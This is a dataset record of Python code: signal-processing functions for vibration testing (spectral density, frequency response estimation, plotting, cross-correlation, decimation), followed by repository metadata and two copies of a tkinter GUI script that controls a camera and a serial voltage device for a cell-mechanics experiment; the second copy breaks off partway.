def asd(x, t, windowname="none", ave=bool(True)):
"""Return autospectrum (power spectrum) density of a signal x.
Parameters
----------
x : float array
Data array (n x N x m) where n is the number of sensors, m the
number of experiments.
t : float array
Time array (1 x N)
windowname : string
Name of windowing function to use. See `window`.
ave : bool, optional(True)
Average result or not?
Returns
-------
f : float array
Frequency vector (1 x N)
Pxx : float array
Autospectrum (n x N) or (n x N x m) if not averaged.
Examples
--------
>>> from scipy import signal
>>> import numpy as np
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy.linalg as la
Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by
0.001 V**2/Hz of white noise sampled at 1 kHz.
>>> sample_freq = 1e3
>>> tfinal = 5
>>> sig_freq=50
>>> A=10
>>> noise_power = 0.0001 * sample_freq / 2
>>> noise_power = A/1e12
>>> time = np.arange(0,tfinal,1/sample_freq)
>>> time = np.reshape(time, (1, -1))
>>> x = A*np.sin(2*np.pi*sig_freq*time)
>>> x = x + np.random.normal(scale=np.sqrt(noise_power),
... size=(1, time.shape[1]))
>>> fig, (ax1, ax2) = plt.subplots(2,1)
>>> ax1.plot(time[0,:],x[0,:])
[<matplotlib.lines.Line2D object at ...>]
>>> ax1.set_title('Time history')
Text(0.5,1,'Time history')
>>> ax1.set_xlabel('Time (sec)')
Text(0.5,0,'Time (sec)')
>>> ax1.set_ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
Compute and plot the autospectrum density.
>>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False))
>>> ax2.plot(freq_vec, 20*np.log10(Pxx[0,:]))
[<matplotlib.lines.Line2D object at ...>]
>>> ax2.set_ylim([-400, 100])
(-400, 100)
>>> ax2.set_xlabel('frequency (Hz)')
Text(0.5,0,'frequency (Hz)')
>>> ax2.set_ylabel('PSD (V**2/Hz)')
Text(0,0.5,'PSD (V**2/Hz)')
If we average the last half of the spectral density, to exclude the
peak, we can recover the noise power on the signal.
"""
f, Pxx = crsd(x, x, t, windowname=windowname, ave=ave)
Pxx = Pxx.real
return f, Pxx
def crsd(x, y, t, windowname="none", ave=bool(True)):
"""
Calculate the cross spectrum (power spectrum) density between two signals.
Parameters
----------
x, y : arrays
Data array (n x N x m) where n is the number of sensors, m the
number of experiments.
t : array
Time array (1 x N)
windowname : string
Name of windowing function to use. See `window`.
ave : bool, optional
Average result or not?
Returns
-------
f : array
Frequency vector (1 x N)
Pxy : array
Autospectrum (n x N) or (n x N x m) if not averaged.
Examples
--------
>>> from scipy import signal
>>> import numpy as np
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy.linalg as la
Generate a 5 second test signal, a 10 V sine wave at 50 Hz, corrupted by
0.001 V**2/Hz of white noise sampled at 1 kHz.
>>> sample_freq = 1e3
>>> tfinal = 5
>>> sig_freq=50
>>> A=10
>>> noise_power = 0.0001 * sample_freq / 2
>>> noise_power = A/1e12
>>> time = np.arange(0,tfinal,1/sample_freq)
>>> time = np.reshape(time, (1, -1))
>>> x = A*np.sin(2*np.pi*sig_freq*time)
>>> x = x + np.random.normal(scale=np.sqrt(noise_power),
... size=(1, time.shape[1]))
>>> fig = plt.figure()
>>> plt.subplot(2,1,1)
<matplotlib...>
>>> plt.plot(time[0,:],x[0,:])
[<matplotlib.lines.Line2D object at ...>]
>>> plt.title('Time history')
Text(0.5,1,'Time history')
>>> plt.xlabel('Time (sec)')
Text(0.5,0,'Time (sec)')
>>> plt.ylabel('$x(t)$')
Text(0,0.5,'$x(t)$')
Compute and plot the autospectrum density.
>>> freq_vec, Pxx = vt.asd(x, time, windowname="hanning", ave=bool(False))
>>> plt.subplot(2,1,2)
<matplotlib...>
>>> plt.plot(freq_vec, 20*np.log10(Pxx[0,:]))
[<matplotlib.lines.Line2D object at ...>]
>>> plt.ylim([-400, 100])
(-400, 100)
>>> plt.xlabel('frequency (Hz)')
Text(0.5,0,'frequency (Hz)')
>>> plt.ylabel('PSD (V**2/Hz)')
Text(0,0.5,'PSD (V**2/Hz)')
>>> fig.tight_layout()
"""
# t_shape = t.shape
t = t.flatten()
if len(t) == 1:
dt = t
else:
dt = t[2] - t[1]
if dt <= 0:
print('You sent in bad data. Delta t is negative. \
Please check your inputs.')
if len(x.shape) == 1:
x = np.expand_dims(x, axis=0)
x = np.expand_dims(x, axis=2)
y = np.expand_dims(y, axis=0)
y = np.expand_dims(y, axis=2)
n = x.shape[1]
if windowname is False or windowname.lower() is "none":
win = 1
else:
# print('This doesn\'t work yet')
windowname = windowname.lower()
win = 1
if windowname == "hanning":
win = window(x, windowname='hanning')
elif windowname == "blackwin":
win = window(x, windowname='blackwin')
elif windowname == "boxwin":
win = window(x, windowname='boxwin')
elif windowname == "expwin":
win = window(x, windowname='expwin')
elif windowname == "hammwin":
win = window(x, windowname='hamming')
elif windowname == "triwin":
win = window(x, windowname='triwin')
elif windowname == "flatwin":
win = window(x, windowname='flatwin')
y = y * win
x = x * win
del win
ffty = np.fft.rfft(y, n, axis=1) * dt
fftx = np.fft.rfft(x, n, axis=1) * dt
Pxy = np.conj(fftx) * ffty / (n * dt) * 2
if len(Pxy.shape) == 3 and Pxy.shape[2] > 1 and ave:
Pxy = np.mean(Pxy, 2)
nfreq = 1 / dt / 2
f = np.linspace(0, nfreq, Pxy.shape[1]) # /2./np.pi
return f, Pxy
def frfest(x, f, dt, windowname="hanning", ave=bool(True), Hv=bool(False)):
r"""Return freq, H1, H2, coh, Hv.
Estimates the :math:`H(j\omega)` Frequency Response Functions (FRFs)
between :math:`x` and :math:`f`.
Parameters
----------
x : float array
output or response of system
f : float array
input to system
dt : float
time step of samples
windowname : string
One of: hanning, hamming, blackman, flatwin, boxwin
ave : bool, optional(True)- currently locked
whether or not to average PSDs and ASDs or calculate raw FRFs
Hv : bool, optional(False)
calculate the :math:`H_v` frequency response function
Returns
-------
freq : float array
frequency vector (1xN)
H1 : float array
Frequency Response Function :math:`H_1` estimate, (nxN) or (nxNxm)
H2 : float array
Frequency Response Function :math:`H_2` estimate, (nxN) or (nxNxm)
coh : float array
Coherance Function :math:`\gamma^2` estimate, (nxN)
Hv : float array
Frequency Response Function :math:`H_v` estimate, (nxN) or (nxNxm)
Currently ``ave`` is locked to default values.
Examples
--------
>>> import control as ctrl
>>> import matplotlib.pyplot as plt
>>> import vibrationtesting as vt
>>> import numpy as np
>>> sample_freq = 1e3
>>> noise_power = 0.001 * sample_freq / 2
>>> A = np.array([[0, 0, 1, 0],
... [0, 0, 0, 1],
... [-200, 100, -.2, .1],
... [100, -200, .1, -.2]])
>>> B = np.array([[0], [0], [1], [0]])
>>> C = np.array([[35, 0, 0, 0], [0, 35, 0, 0]])
>>> D = np.array([[0], [0]])
>>> sys = ctrl.ss(A, B, C, D)
>>> tin = np.arange(0, 51.2, .1)
>>> nr = .5 # 0 is all noise on input
>>> for i in np.arange(520):
... u = np.random.normal(scale=np.sqrt(noise_power), size=tin.shape)
... #print(u)
... t, yout, xout = ctrl.forced_response(sys, tin, u,rtol=1e-12)
... if 'Yout' in locals():
... Yout=np.dstack((Yout,yout
... +nr*np.random.normal(scale=.050*np.std(yout[0,:]),
... size=yout.shape)))
... Ucomb=np.dstack((Ucomb,u+(1-nr)
... *np.random.normal(scale=.05*np.std(u),
... size=u.shape)))
... else:
... Yout=yout+nr*np.random.normal(scale=.05*np.std(yout[0,:]),
... size=yout.shape)
... # noise on output is 5% scale of input
... Ucomb=u+(1-nr)*np.random.normal(scale=.05*np.std(u),
... size=u.shape)#(1, len(tin)))
... # 5% noise signal on input
>>> f, Hxy1, Hxy2, coh, Hxyv = vt.frfest(Yout, Ucomb, t, Hv=bool(True))
>>> vt.frfplot(f,Hxy2,freq_max=3.5, legend=['$H_{11}$', '$H_{12}$'])
... # doctest: +SKIP
>>> vt.frfplot(f, np.vstack((Hxy1[0,:], Hxy2[0,:], Hxyv[0,:])),
... legend=['$H_{11-1}$','$H_{11-2}$','$H_{11-v}$'])
... # doctest: +SKIP
Notes
-----
.. note:: Not compatible with scipy.signal functions
.. seealso:: :func:`asd`, :func:`crsd`, :func:`frfplot`.
.. warning:: hanning window cannot be selected yet. Averaging cannot be
unslected yet.
.. todo:: Fix averaging, windowing, multiple input.
"""
if len(f.shape) == 1:
f = f.reshape(1, -1, 1)
if len(x.shape) == 1:
x = x.reshape(1, -1, 1)
if len(f.shape) == 2:
if (f.shape).index(max(f.shape)) == 0:
f = f.reshape(max(f.shape), min(f.shape), 1)
else:
f = f.reshape(1, max(f.shape), min(f.shape))
if len(x.shape) == 2:
if (x.shape).index(max(x.shape)) == 0:
x = x.reshape(max(x.shape), min(x.shape), 1)
else:
x = x.reshape(1, max(x.shape), min(x.shape))
# Note: Two different ways to ignore returned values shown
Pff = asd(f, dt, windowname=windowname)[1]
freq, Pxf = crsd(x, f, dt, windowname=windowname)
_, Pxx = asd(x, dt)
# Note Pfx=conj(Pxf) is applied in the H1 FRF estimation
Txf1 = np.conj(Pxf / Pff)
Txf2 = Pxx / Pxf
# Nulled to avoid output problems/simplify calls if unrequested
Txfv = np.zeros_like(Txf1)
coh = (Pxf * np.conj(Pxf)).real / Pxx / Pff
if Hv:
for i in np.arange(Pxx.shape[1]):
frfm = np.array(
[[Pff[0, i], np.conj(Pxf[0, i])], [Pxf[0, i], Pxx[0, i]]])
alpha = 1 # np.sqrt(Pff[0,i]/Pxx[0,i])
frfm = np.array([[Pff[0, i], alpha * np.conj(Pxf[0, i])],
[alpha * Pxf[0, i], alpha**2 * Pxx[0, i]]])
lam, vecs = la.eigh(frfm)
index = lam.argsort()
lam = lam[index]
vecs = vecs[:, index]
Txfv[0, i] = -(vecs[0, 0] / vecs[1, 0]) / alpha
return freq, Txf1, Txf2, coh, Txfv
def frfplot(freq, H, freq_min=0, freq_max=None, type=1, legend=[]):
    """Frequency Response Function pretty plotting.

    Plots frequency response functions in a variety of formats

    Parameters
    ----------
    freq : float array
        Frequency vector (rad/sec), (1xN)
    H : float array
        Frequency response functions (nxN)
    freq_min : float, optional
        Low frequency for plot (default 0)
    freq_max : float, optional
        High frequency for plot (default max frequency)
    legend : string array
        Array of string for use in legend.
    type : int, optional
        Plot type. See notes.

    Returns
    -------
    ax : axis objects
        allows manipulation of plot parameters (xlabel, title...).
        None if the requested plot type is not supported.

    Examples
    --------
    >>> import matplotlib.pyplot as plt
    >>> import vibrationtesting as vt
    >>> import numpy as np
    >>> f=np.linspace(0,100,10000).reshape(-1,1);
    >>> w=f*2*np.pi;
    >>> k=1e5;m=1;c=1;
    >>> frf1=1./(m*(w*1j)**2+c*1j*w+k)
    >>> frf2=1./(m*(w*1j)**2+c*1j*w+k*3)
    >>> _ = vt.frfplot(f,np.hstack((frf1,frf2)), legend = ['FRF 1','FRF 2'])
    ... # doctest: +SKIP

    Notes
    -----
    +---------+------------------------------------------------+
    | type    | Plot style                                     |
    +=========+================================================+
    | 1 (def) | Magnitude and Phase versus F                   |
    +---------+------------------------------------------------+
    | 2       | Magnitude and Phase versus log10(F)            |
    +---------+------------------------------------------------+
    | 3       | Bodelog  (Magnitude and Phase versus log10(w)) |
    +---------+------------------------------------------------+
    | 4       | Real and Imaginary                             |
    +---------+------------------------------------------------+
    | 5       | Nyquist  (Imaginary versus Real)               |
    +---------+------------------------------------------------+
    | 6       | Magnitude versus F                             |
    +---------+------------------------------------------------+
    | 7       | Phase versus F                                 |
    +---------+------------------------------------------------+
    | 8       | Real versus F                                  |
    +---------+------------------------------------------------+
    | 9       | Imaginary versus F                             |
    +---------+------------------------------------------------+
    | 10      | Magnitude versus log10(F)                      |
    +---------+------------------------------------------------+
    | 11      | Phase versus log10(F)                          |
    +---------+------------------------------------------------+
    | 12      | Real versus log10(F)                           |
    +---------+------------------------------------------------+
    | 13      | Imaginary versus log10(F)                      |
    +---------+------------------------------------------------+
    | 14      | Magnitude versus log10(w)                      |
    +---------+------------------------------------------------+
    | 15      | Phase versus log10(w)                          |
    +---------+------------------------------------------------+

    .. seealso:: `frfest`

    Copyright J. Slater, Dec 17, 1994
    Updated April 27, 1995
    Ported to Python, July 1, 2015
    """
    FLAG = type  # Plot type; parameter named 'type' kept for compatibility.
    freq = freq.reshape(1, -1)
    lenF = freq.shape[1]
    # `is 1` compared int identity (interning-dependent, SyntaxWarning on
    # modern Pythons); use == here and for FLAG below.
    if len(H.shape) == 1:
        H = H.reshape(1, -1)
    if H.shape[0] > H.shape[1]:
        H = H.T
    if freq_max is None:
        freq_max = np.max(freq)
    if freq_min is None:
        freq_min = np.min(freq)
    if freq_min < np.min(freq):
        freq_min = np.min(freq)
    if freq_min > freq_max:
        raise ValueError('freq_min must be less than freq_max.')
    # Convert the requested frequency band into index bounds.
    inlow = int(lenF * (freq_min - np.amin(freq)
                        ) // (np.amax(freq) - np.amin(freq)))
    inhigh = int(lenF * (freq_max - np.amin(freq)
                         ) // (np.amax(freq) - np.amin(freq)) - 1)
    H = H[:, inlow:inhigh]
    freq = freq[:, inlow:inhigh]
    mag = 20 * np.log10(np.abs(H))
    minmag = np.min(mag)
    maxmag = np.max(mag)
    phase = np.unwrap(np.angle(H)) * 180 / np.pi
    # Round the phase limits out to the nearest 45 degrees.
    phmin = np.amin(phase) // 45 * 45.0
    phmax = (np.amax(phase) // 45 + 1) * 45
    # Initialized so the unsupported-type path below does not raise
    # NameError at `return ax` (as the original did).
    ax = None
    if FLAG == 1:
        fig, (ax1, ax2) = plt.subplots(2, 1)
        ax1.plot(freq.T, mag.T)
        ax1.set_xlabel('Frequency (Hz)')
        ax1.set_ylabel('Mag (dB)')
        ax1.grid()
        ax1.set_xlim(xmax=freq_max, xmin=freq_min)
        ax1.set_ylim(ymax=maxmag, ymin=minmag)
        ax2.plot(freq.T, phase.T)
        ax2.set_xlabel('Frequency (Hz)')
        ax2.set_ylabel('Phase (deg)')
        ax2.grid()
        ax2.set_xlim(xmax=freq_max, xmin=freq_min)
        ax2.set_ylim(ymax=phmax, ymin=phmin)
        ax2.set_yticks(np.arange(phmin, (phmax + 45), 45))
        fig.tight_layout()
        if len(legend) > 0:
            plt.legend(legend)
        ax = (ax1, ax2)
    else:
        print("Sorry, that option isn't supported yet")
    return ax
"""# elif FLAG==2:
# subplot(2,1,1)
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# % Fmin,Fmax,min(mag),max(mag)
# axis([Fmin Fmax minmag maxmag])
# subplot(2,1,2)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elif FLAG==3:
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# elseif FLAG==4
# subplot(2,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# subplot(2,1,2)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==5
# subplot(1,1,1)
# imax=round(length(F)*Fmax/max(F));
# imin=round(length(F)*Fmin/max(F))+1;
# plot(real(Xfer(imin:imax)),imag(Xfer(imin:imax)))
# xlabel('Real')
# ylabel('Imaginary')
# grid on
# zoom on
# elseif FLAG==6
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==7
# subplot(1,1,1)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==8
# subplot(1,1,1)
# plot(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==9
# subplot(1,1,1)
# plot(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==10
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# elseif FLAG==11
# subplot(1,1,1)
# semilogx(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# elseif FLAG==12
# subplot(1,1,1)
# semilogx(F,real(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Real')
# grid on
# axis([Fmin Fmax minreal maxreal])
# zoom on
# elseif FLAG==13
# subplot(1,1,1)
# semilogx(F,imag(Xfer))
# xlabel('Frequency (Hz)')
# ylabel('Imaginary')
# grid on
# axis([Fmin Fmax minimag maximag])
# zoom on
# elseif FLAG==14
# subplot(1,1,1)
# mag=20*log10(abs(Xfer));
# semilogx(F*2*pi,mag)
# xlabel('Frequency (Rad/s)')
# ylabel('Mag (dB)')
# grid on
# axis([Wmin Wmax minmag maxmag])
# zoom on
# elseif FLAG==15
# subplot(1,1,1)
# semilogx(F*2*pi,phase)
# xlabel('Frequency (Rad/s)')
# ylabel('Phase (deg)')
# grid on
# axis([Wmin Wmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
# else
# subplot(2,1,1)
# mag=20*log10(abs(Xfer));
# plot(F,mag)
# xlabel('Frequency (Hz)')
# ylabel('Mag (dB)')
# grid on
# axis([Fmin Fmax minmag maxmag])
# zoom on
# subplot(2,1,2)
# plot(F,phase)
# xlabel('Frequency (Hz)')
# ylabel('Phase (deg)')
# grid on
# phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45];
# axis([Fmin Fmax phmin_max(1) phmin_max(2)])
# gridmin_max=round(phmin_max/90)*90;
# set(gca,'YTick',gridmin_max(1):90:gridmin_max(2))
# zoom on
"""
def xcorr(t, x, y, zeropad=True):
    """Return the cross-correlation of signals x and y.

    Parameters
    ----------
    t : float array
        Time array for the signals (uniform spacing assumed).
    x, y : float arrays
        Signals to correlate (same length).
    zeropad : bool, optional
        If True (default), zero pad to twice the signal length so the
        circular FFT correlation does not wrap around.

    Returns
    -------
    tau : float array
        Lag (time shift) axis, centered on zero lag.
    xcor : float array
        Cross-correlation of x and y at each lag.
    """
    # The original implementation mixed np.fft.rfft with scipy's removed
    # `sp.fft`/`sp.ifft` helpers, so the half-length and full-length
    # spectra had incompatible shapes and the default (zeropad) path
    # crashed. Use the full complex FFT consistently instead.
    if zeropad is True:
        nfft = len(x) * 2
    else:
        nfft = len(x)
    Xn = np.fft.fft(x, n=nfft)
    Yn = np.conj(np.fft.fft(y, n=nfft))
    # ifft of X * conj(Y) is the (circular) correlation; fftshift moves
    # zero lag to the center of the record.
    xcor = np.real(np.fft.fftshift(np.fft.ifft(Xn * Yn)))
    dt = t[1] - t[0]
    tau = np.linspace(-len(xcor) / 2 * dt - dt / 2,
                      len(xcor) / 2 * dt - dt / 2, len(xcor))
    return tau, xcor
def hammer_impulse(time, imp_time=None, imp_duration=None, doublehit=False,
                   dh_delta=None):
    """Generate simulated hammer hit (half sine).

    Parameters
    ----------
    time : float array
        1 x N time array. Suggest using `np.linspace(0,10,1000).reshape(1,-1)`
        for example
    imp_time : float (optional)
        Time of onset of impulse. Default is 0.1 time end time- which
        traditionally works well for impact testing
    imp_duration : float (optional)
        Duration of impulse. Default is 0.01 of total record
    doublehit : Boolean (optional)
        Allows repeat of hit to emulate a bad strike. Default is False
    dh_delta : float (optional)
        Time difference between primary strike and accidental second strike
        Default is 0.02 of record.

    Returns
    -------
    force : float array
        Force record, normalized so it integrates to unity.

    Examples
    --------
    >>> import vibrationtesting as vt
    >>> time = np.linspace(0,10,1024).reshape(1,-1)
    >>> force = vt.hammer_impulse(time, doublehit=True)
    >>> plt.plot(time.T, force.T)
    [<matplotlib.lines.Line2D object...
    """
    time_max = np.max(time)
    if imp_time is None:
        imp_time = 0.1 * time_max
    if imp_duration is None:
        imp_duration = 0.01 * time_max
    if dh_delta is None:
        dh_delta = 0.02
    dh_delta = dh_delta * time_max
    time = time.reshape(1, -1)
    # Convert times into sample indices.
    imp_onset_index = int(time.shape[1] * imp_time / time_max)
    imp_offset_index = int((time.shape[1]) *
                           (imp_time + imp_duration) / time_max)
    imp_length = imp_offset_index - imp_onset_index
    # Half sine: a sine of period twice the impulse duration.
    T = imp_duration * 2
    omega = 2 * np.pi / T
    impulse = np.sin(omega * time[0, :imp_length])
    force = np.zeros_like(time)
    force[0, imp_onset_index:imp_onset_index + imp_length] = impulse
    if doublehit is True:
        # Second, accidental strike dh_delta later, same shape.
        doub_onset_index = int(time.shape[1]
                               * (imp_time + dh_delta) / time_max)
        force[0, doub_onset_index:doub_onset_index + imp_length] = impulse
    # `scipy.integrate.simps` was renamed `simpson` and removed in
    # SciPy 1.14; fall back to the old name on older SciPy releases.
    simpson_rule = getattr(spi, 'simpson', None)
    if simpson_rule is None:
        simpson_rule = spi.simps
    # Normalize so the impulse integrates to unity.
    force = force / simpson_rule(force.reshape(-1), dx=time[0, 1])
    return force
def decimate(t, in_signal, sample_frequency):
    r"""Decimate a signal to mimic sampling anti-aliased signal.

    Applies an 8th-order low-pass Butterworth filter with cutoff at 45%
    of ``sample_frequency`` and then keeps every ``step``-th sample so
    the result is (approximately) sampled at ``sample_frequency``.

    Parameters
    ----------
    t : float array
        time array, size (N,)
    in_signal : float array
        signal array, size (N,), (m,N), or (m,N,n)
    sample_frequency : float
        new sampling frequency

    Returns
    -------
    time : float array
    decimated_signal : float array

    Examples
    --------
    >>> time = np.linspace(0,4,4096)
    >>> u = np.random.randn(1,len(time))
    >>> ttime, signal_out = decimate(time, u, 100)
    """
    sample_period = t[1] - t[0]
    current_frequency = 1 / sample_period
    freq_frac = sample_frequency / current_frequency
    # Anti-aliasing cutoff: 90% of the new Nyquist rate, i.e. 45% of
    # the new sampling frequency (Wn is relative to current Nyquist).
    b, a = signal.butter(8, .9 * freq_frac, 'low')
    n_dims = len(in_signal.shape)
    if n_dims > 1:
        filtered = signal.lfilter(b, a, in_signal, axis=1)
    else:
        filtered = signal.lfilter(b, a, in_signal)
    # Keep every step-th sample of the filtered record.
    step = int(1 / freq_frac)
    time = t[::step]
    if n_dims == 1:
        filtered = filtered[::step]
    elif n_dims == 2:
        filtered = filtered[:, ::step]
    elif n_dims == 3:
        filtered = filtered[:, ::step, :]
    return time, filtered
| 0 | 0 | 0 |
db255c8246a0e7204c25b22268d2980bd45f40ed | 7,260 | py | Python | GUIcode.py | snakerboy1234/Cytomech | 69f27e72fc5f771245162b9a9fb63a81baa5b1c7 | [
"MIT"
] | null | null | null | GUIcode.py | snakerboy1234/Cytomech | 69f27e72fc5f771245162b9a9fb63a81baa5b1c7 | [
"MIT"
] | null | null | null | GUIcode.py | snakerboy1234/Cytomech | 69f27e72fc5f771245162b9a9fb63a81baa5b1c7 | [
"MIT"
] | null | null | null | import serial
import time
import tkinter
import tkinter.font as font
from datetime import datetime
from PIL import ImageTk, Image
import sys
import pypylon.pylon as py
import matplotlib.pyplot as plt
import numpy as np
import cv2
# SOME PART OF CAMERA CODE CREATES AN INSTANCE OF TK THAT USES PACK. SO WE CANNOT USE GRID AND WE HAVE TO
# ASSIGN EACH COMPONENT TO THE MASTER=FRAME
# Note that the camera code will throw exception if camera is not connected.
# Locate & Initialize camera
cam = py.InstantCamera(py.TlFactory.GetInstance().CreateFirstDevice())
cam.Open()
# Reset to factory Defaults
cam.UserSetSelector = "Default"
cam.UserSetLoad.Execute()
# Set to blk/white photo
cam.PixelFormat = "RGB8"
# Take one picture - need dif approach for looping imgs
res = cam.GrabOne(1000)
# Get array form of picture
img = res.Array
# Display our image
plt.imshow(img)
# Below is the code for handling images in the background
# We need this so that our GUI still responds while pictures are being taken automatically
# We need to decide how many pictures we want to take with each burst, and whether the user tells us when to take or whether they are collected automatically
# We should also display the images as they are taken (or at least one from each burst) so that the user has some sense of what's actually happening
# If we want to do all camera management through our GUI, we should have a way for the user to see what's happening without saving the pictures to save space
# We also need to decide WHEN we want to calculate deformation. If we calculate it automatically then we could do so as soon as the images are taken.
# If we rely on the user to outline the image, we need to make sure that we hold onto the voltage value associated with the image until that time.
converter = py.ImageFormatConverter()
converter.OutputPixelFormat = py.PixelType_BGR8packed
converter.OutputBitAlignment = py.OutputBitAlignment_MsbAligned
imgs = []
ser = serial.Serial('com3', 9600)
ser.write(bytes([0]))
frame = tkinter.Tk()
frame.geometry('1000x800')
frame.title("Cytomech DEP Controller")
lgFont = "Times 20 bold"
PIL_image = np.ones((900,600))*150
tk_image = ImageTk.PhotoImage(master=frame,image=Image.fromarray(PIL_image))
imgLbl = tkinter.Label(frame,image=tk_image,width=900,height=600)
imgLbl.pack()
decVoltageBtn = tkinter.Button(frame,
text="-",
font=lgFont,
command=decVoltage,
height = 2,
fg = "black",
bg = 'yellow',
width = 4,
bd = 5,
activebackground='white'
)
#decVoltageBtn.grid(row=1,column=1,rowspan=2, padx=20, pady=5)
decVoltageBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
voltageTxt = tkinter.StringVar(master=frame)
voltIndex = tkinter.IntVar(master=frame)
voltIndex.set(0)
voltageTxt.set("Current Vpp (est): 0")
voltLbl = tkinter.Label(frame,textvariable=voltageTxt, width = 15,font=lgFont)
#voltLbl.grid(row=3,column=1,columnspan=3, padx=20, pady=5)
voltLbl.pack(pady = 10,expand=True,fill='both',side="left")
incVoltageBtn = tkinter.Button(frame,
text="+",
font=lgFont,
command=incVoltage,
height = 2,
fg = "black",
bg = 'green',
width = 4,
bd = 5,
activebackground='white'
)
#incVoltageBtn.grid(row=1,column=3,rowspan=2)
incVoltageBtn.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
photoBtn = tkinter.Button(frame,
text="Take Photo",
font=lgFont,
command=takePhoto,
height = 2,
fg = "black",
bg = '#FF7715',
width = 10,
bd = 5,
activebackground='white'
)
#photoBtn.grid(row=4,column=1,rowspan=2, padx=20, pady=5)
photoBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
quitButton = tkinter.Button(
frame,
text="QUIT",
font=lgFont,
command=quit,
height = 2,
fg = "black",
width = 5,
bg = 'red',
bd = 5
)
#quitButton.grid(row=4,column=3,rowspan=2, padx=20, pady=5)
quitButton.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
tkinter.mainloop() | 35.072464 | 158 | 0.684022 | import serial
import time
import tkinter
import tkinter.font as font
from datetime import datetime
from PIL import ImageTk, Image
import sys
import pypylon.pylon as py
import matplotlib.pyplot as plt
import numpy as np
import cv2
# SOME PART OF CAMERA CODE CREATES AN INSTANCE OF TK THAT USES PACK. SO WE CANNOT USE GRID AND WE HAVE TO
# ASSIGN EACH COMPONENT TO THE MASTER=FRAME
# Note that the camera code will throw exception if camera is not connected.
# Locate & Initialize camera
cam = py.InstantCamera(py.TlFactory.GetInstance().CreateFirstDevice())
cam.Open()
# Reset to factory Defaults
cam.UserSetSelector = "Default"
cam.UserSetLoad.Execute()
# Set to blk/white photo
cam.PixelFormat = "RGB8"
# Take one picture - need dif approach for looping imgs
res = cam.GrabOne(1000)
# Get array form of picture
img = res.Array
# Display our image
plt.imshow(img)
# Below is the code for handling images in the background
# We need this so that our GUI still responds while pictures are being taken automatically
# We need to decide how many pictures we want to take with each burst, and whether the user tells us when to take or whether they are collected automatically
# We should also display the images as they are taken (or at least one from each burst) so that the user has some sense of what's actually happening
# If we want to do all camera management through our GUI, we should have a way for the user to see what's happening without saving the pictures to save space
# We also need to decide WHEN we want to calculate deformation. If we calculate it automatically then we could do so as soon as the images are taken.
# If we rely on the user to outline the image, we need to make sure that we hold onto the voltage value associated with the image until that time.
class HysteresisImgWrapper():
    """Bundle one captured camera frame with the voltage at capture time.

    Per the design notes above, the image must be kept together with the
    voltage that was applied when it was taken so that cell deformation
    can be associated with that voltage later.
    """

    def __init__(self, imageArray, voltageLevel):
        """Store the frame and its voltage; deformation starts at 0."""
        self.img = imageArray  # raw pixel array from the camera grab
        self.voltage = voltageLevel  # estimated Vpp when the frame was taken
        self.deformation = 0  # placeholder; presumably filled in after outlining — TODO confirm
converter = py.ImageFormatConverter()
converter.OutputPixelFormat = py.PixelType_BGR8packed
converter.OutputBitAlignment = py.OutputBitAlignment_MsbAligned
imgs = []
def takePhoto():
    """Grab one frame, show it in the GUI, and save it to disk.

